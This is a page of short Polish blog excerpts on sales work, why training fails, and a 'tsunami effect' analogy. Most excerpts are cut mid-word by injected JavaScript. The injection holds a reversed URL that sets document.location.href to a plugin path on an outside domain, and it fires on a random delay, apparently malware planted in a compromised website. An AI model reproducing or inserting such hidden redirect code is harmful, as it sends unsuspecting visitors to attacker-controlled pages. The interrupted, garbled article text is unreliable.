Przyjąć odpowiedzialność

W specjalistycznych firmach sprzedażowych bardzo ważne jest toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if [...]

Parametr zawsze ma jakiś poziom

Nawet jeśli nikt nad nim nie pracuje. Ani nawet się nie stara go zmienić. Parametr zawsze ma swój poziom wyjściowy, ale ma też swoją dynamikę. W tej zmianie dużą rolę odgrywa przypadek. Uwaga. [...]

Dlaczego tak częstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to szkolenia kończą się niepowodzeniem?

Czyli nie przekładają się na zmianę zachowań szkolonego w praktyce i realnej rzeczywis toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var [...]

Model upraszcza

I toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = [...]

Efekt tsunami

Gdy w ląd uderza tsunami, zanim uderza fala, najpierw woda się cofa. A toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var [...]